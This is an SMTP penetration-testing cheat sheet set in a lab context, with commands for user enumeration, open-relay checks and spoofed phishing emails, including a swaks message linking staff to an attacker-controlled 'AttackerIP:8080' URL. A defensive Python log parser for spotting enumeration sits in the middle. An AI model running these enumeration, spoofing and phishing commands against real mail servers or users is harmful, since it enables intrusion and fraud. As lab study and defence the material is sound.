[25,465,587] SMTP
Default Configuration: /etc/postfix/main.cf
Verify a user without sending an email
Intrusionz3r0X@htb[/htb]$ swaks --auth-user 'administrator@mailing.htb' --auth LOGIN --auth-password homenetworkingadministrator --quit-after AUTH --server mailing.htb
Enumerate SMTP
#Enumerate the service
Intrusionz3r0X@htb[/htb]$ sudo nmap 10.129.14.128 -sC -sV -p25
# Open Relay checks (Using 16 different tests)
Intrusionz3r0X@htb[/htb]$ sudo nmap 10.129.14.128 -p25 --script smtp-open-relay -v
# User enumeration
Intrusionz3r0X@htb[/htb]$ smtp-user-enum -M RCPT -U userlist.txt -D inlanefreight.htb -t 10.129.203.7
Metasploit: auxiliary/scanner/smtp/smtp_enum
smtp-user-enum: smtp-user-enum -M <MODE> -u <USER> -t <IP>
Nmap: nmap --script smtp-enum-users <IP>
#Open relay attack
Intrusionz3r0X@htb[/htb]# nmap -p25 -Pn --script smtp-open-relay 10.10.11.213
Intrusionz3r0X@htb[/htb]# swaks --from notifications@inlanefreight.com --to employees@inlanefreight.com --header 'Subject: Company Notification' --body 'Hi All, we want to hear from you! Please complete the following survey. http://mycustomphishinglink.com/' --server 10.10.11.213
#Enumerate Users by using VRFY
VRFY root
252 2.0.0 root
VRFY new-user (User doesn't exist)
550 5.1.1 <new-user>: Recipient address rejected: User unknown in local recipient table
#Enumerate Users by using EXPN
EXPN john
250 2.1.0 john@inlanefreight.htb
EXPN support-team
250 2.0.0 carol@inlanefreight.htb
250 2.1.5 elisa@inlanefreight.htb
#Enumerate Users by using RCPT TO
RCPT TO:kate
550 5.1.1 kate... User unknown
RCPT TO:john
250 2.1.5 john... Recipient ok
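The VRFY and RCPT TO probes above leave one "User unknown" rejection per guessed name in the mail log, which gives defenders a signal to watch. The following is an added example, not part of the original notes: it flags clients that trigger rejections for several distinct unknown recipients. The log lines are constructed and modelled on the Postfix rejection text shown above; the function name and threshold are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample, modelled on Postfix smtpd syslog lines (not taken from the page).
SAMPLE_LOG = """\
Jan 10 09:00:01 mail postfix/smtpd[2101]: connect from unknown[10.10.14.5]
Jan 10 09:00:02 mail postfix/smtpd[2101]: NOQUEUE: reject: VRFY from unknown[10.10.14.5]: 550 5.1.1 <new-user>: Recipient address rejected: User unknown in local recipient table; to=<new-user> proto=SMTP helo=<x>
Jan 10 09:00:03 mail postfix/smtpd[2101]: NOQUEUE: reject: RCPT from unknown[10.10.14.5]: 550 5.1.1 <kate@inlanefreight.htb>: Recipient address rejected: User unknown in local recipient table; from=<a@x> to=<kate@inlanefreight.htb> proto=SMTP helo=<x>
Jan 10 09:00:03 mail postfix/smtpd[2101]: NOQUEUE: reject: RCPT from unknown[10.10.14.5]: 550 5.1.1 <admin@inlanefreight.htb>: Recipient address rejected: User unknown in local recipient table; from=<a@x> to=<admin@inlanefreight.htb> proto=SMTP helo=<x>
Jan 10 09:00:04 mail postfix/smtpd[2101]: NOQUEUE: reject: RCPT from unknown[10.10.14.5]: 550 5.1.1 <Kate@inlanefreight.htb>: Recipient address rejected: User unknown in local recipient table; from=<a@x> to=<Kate@inlanefreight.htb> proto=SMTP helo=<x>
Jan 10 09:05:00 mail postfix/smtpd[2140]: NOQUEUE: reject: RCPT from mx.partner.example[192.0.2.20]: 550 5.1.1 <jonh@inlanefreight.htb>: Recipient address rejected: User unknown in local recipient table; from=<b@partner.example> to=<jonh@inlanefreight.htb> proto=ESMTP helo=<mx.partner.example>
"""

# Captures the client IP and the rejected name from a VRFY or RCPT "user unknown" rejection.
REJECT = re.compile(
    r"reject: (?:VRFY|RCPT) from \S+?\[([^\]]+)\]: 550 5\.1\.1 <([^>]*)>"
)


def find_enumeration(log_text, threshold=3):
    """Return {client_ip: sorted unknown names} for clients whose number of
    distinct unknown recipients reaches the threshold (assumed default: 3)."""
    probed = defaultdict(set)
    for line in log_text.splitlines():
        m = REJECT.search(line)
        if m:
            ip, name = m.groups()
            # Lower-case so case variants of one guess count once.
            probed[ip].add(name.lower())
    return {
        ip: sorted(names)
        for ip, names in probed.items()
        if len(names) >= threshold
    }


if __name__ == "__main__":
    for ip, names in find_enumeration(SAMPLE_LOG).items():
        print(f"possible SMTP user enumeration from {ip}: {names}")
```

A single mistyped address from a partner relay stays below the threshold, while the client that walks a name list is reported. Setting `disable_vrfy_command = yes` in `/etc/postfix/main.cf` removes the VRFY signal entirely, so RCPT rejections are the ones that still need this kind of watch.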
Email sending tools
#Sendemail
Intrusionz3r0X@htb[/htb]$ sendemail -t nico@megabank.com -f customer@inlanefreight.htb -a Invoice.rtf -u "Subject: Please check this out" -s 10.10.10.77 -v
#Swaks
Intrusionz3r0X@htb[/htb]$ swaks --to itsupport@domain.htb --from intrusionz3r0@gmail.com --server mail.server.com --body "Please check this changes out: http://AttackerIP:8080/" --header "Subject:Internal Web App Request"
User mailbox path
/var/spool/mail/<username>
Abuse SMTP relay by sending malicious PHP code and LFI